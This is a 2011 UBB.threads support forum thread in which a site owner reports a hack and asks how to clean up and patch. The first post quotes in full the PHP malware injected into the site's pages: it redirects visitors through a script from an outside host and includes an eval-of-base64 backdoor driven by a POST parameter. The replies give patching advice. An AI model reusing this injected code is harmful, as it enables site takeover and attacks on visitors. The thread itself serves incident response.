Site Links
Home
Features
Documentation
Pricing & Order
Members Area
Support Options
UBBDev.com
UBBWiki.com
Who's Online
2 registered (Gizmo, SteveS), 38 Guests and 14 Spiders online.
Key: Admin, Global Mod, Mod
Featured Member
Registered: 06/07/07
Posts: 4
Top Posters (30 Days)
Ruben 50
DennyP 24
Gizmo 23
Dunny 15
SteveS 13
AllenAyres 12
dbremer 10
SD 10
drkknght00 9
doug 8
Latest Photos
OK Corral Shoot Out
Testing
Basildon Train Station
Basildon Town Centre looking from the rounderbout
Basildon Town Square
Page 1 of 2 1 2 >
Topic Options
#246683 - 11/09/11 02:31 PM Board Hacked
tranmkp Offline
stranger
Registered: 07/23/09
Posts: 16
Loc: Houston, Texas
Some Russian crap site re-director somehow comprised all the php on our web site. No idea how - anyway I can see his code in every php header of page -

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }


I can see it in these two pages ultimatebb.php ---ubbaccel_test.php any other php pages in other directories?

Will I void my support if I remove it all?

Next - is how did they do it?
Top
Express Hosting
Express Hosting "We are the official hosting company of UBB.threads. Ask us about our free migration services to migrate your UBB.threads installation."
#246684 - 11/09/11 02:34 PM Re: Board Hacked [Re: tranmkp]
gliderdad Offline
Registered: 06/08/06
Posts: 1466
Loc: NY
What version of ubb are you running?
Top
#246685 - 11/09/11 02:37 PM Re: Board Hacked [Re: tranmkp]
mig Offline
newbie
Registered: 07/22/05
Posts: 40
Loc: Canada
Top
#246781 - 11/13/11 12:04 PM Re: Board Hacked [Re: gliderdad]
tranmkp Offline
stranger
Registered: 07/23/09
Posts: 16
Loc: Houston, Texas
7.5.4.2
Top
#246782 - 11/13/11 12:31 PM Re: Board Hacked [Re: tranmkp]
tranmkp Offline
stranger
Registered: 07/23/09
Posts: 16
Loc: Houston, Texas
so I went and downloaded the patch - #12 ( I have 7.5.4.2)

Uploaded and overwrote the directories. After flushing cache - How do I verify the patch is functional?
Top
#246783 - 11/13/11 12:32 PM Re: Board Hacked [Re: tranmkp]
Dunny Offline
addict
Registered: 01/16/08
Posts: 460
Loc: DE USA
should say something like this at the bottom of the board...

Powered by UBB.threads™ 7.5.6p2
_________________________
Dunny

Removed link due to bleedover spammers

Dawn of Iskirra
Top
#246790 - 11/13/11 02:27 PM Re: Board Hacked [Re: Dunny]
tranmkp Offline
stranger
Registered: 07/23/09
Posts: 16
Loc: Houston, Texas
nope - nothing yet
Top
#246794 - 11/13/11 03:10 PM Re: Board Hacked [Re: tranmkp]
Gizmo Online   cat

Registered: 06/05/06
Posts: 14995
Loc: Portland, OR; USA
Well, just installing a patch isn't going to fix the problems you have now; it's likely that an attacker has installed a backdoor to allow them to come in and make a mess whenever they want (like the hackers did on most of the forums which where hit a month ago)... You should consider hiring someone to dig through your webspace to check for any of them.
_________________________
Forums: UGN Security & VNC Web Design & Development
UBB.Threads: UBB.Wiki, My UBBSkins, UBB.Sitemaps
Longtime UBB Supporter, UBB Beta Tester & Resident Post-A-Holic.
UBB Modifications, Styling, Coding Services, Disaster Recovery, and more!
Top
#246795 - 11/13/11 03:12 PM Re: Board Hacked [Re: tranmkp]
Gizmo Online   cat

Registered: 06/05/06
Posts: 14995
Loc: Portland, OR; USA
Originally Posted By: tranmkp
nope - nothing yet
Well, if it doesn't show that it's been patched, and you've cleared the cache, you should try re-applying the patch and clearing the cache again... If that doesn't work, try deleting everything from /cache and /templates/compiled and then clear the cache again (or consider paying someone to upgrade you to the latest build; plenty of us offer these services)
_________________________
Forums: UGN Security & VNC Web Design & Development
UBB.Threads: UBB.Wiki, My UBBSkins, UBB.Sitemaps
Longtime UBB Supporter, UBB Beta Tester & Resident Post-A-Holic.
UBB Modifications, Styling, Coding Services, Disaster Recovery, and more!
Top
#246802 - 11/13/11 04:52 PM Re: Board Hacked [Re: tranmkp]
Dunny Offline
addict
Registered: 01/16/08
Posts: 460
Loc: DE USA
I had an issue with file permissions when I installed the files... after I went back and fixed those permissions everything came up correctly.

Dunny
_________________________
Dunny

Removed link due to bleedover spammers

Dawn of Iskirra
Top
Page 1 of 2 1 2 >



Moderator:  AllenAyres, Harold, Ian, Ron M 
Shout Box

Today's Birthdays
No Birthdays
Recent Topics
Temporary Password email not being received
by
05/24/12 10:02 PM
Ability to "like" individual posts (not Facebook "likes)
by doug
05/23/12 09:03 AM
Island Permissions
by ThreadsUser
05/22/12 03:03 PM
streaming video
by prkrgrp
05/20/12 07:02 PM
New Posts Corrupted? Can someone help?
by PianoWorld
05/19/12 09:41 AM
Forum Stats
10492 Members
36 Forums
33842 Topics
181709 Posts

Max Online: 978 @ 06/24/07 11:19 PM
Random Image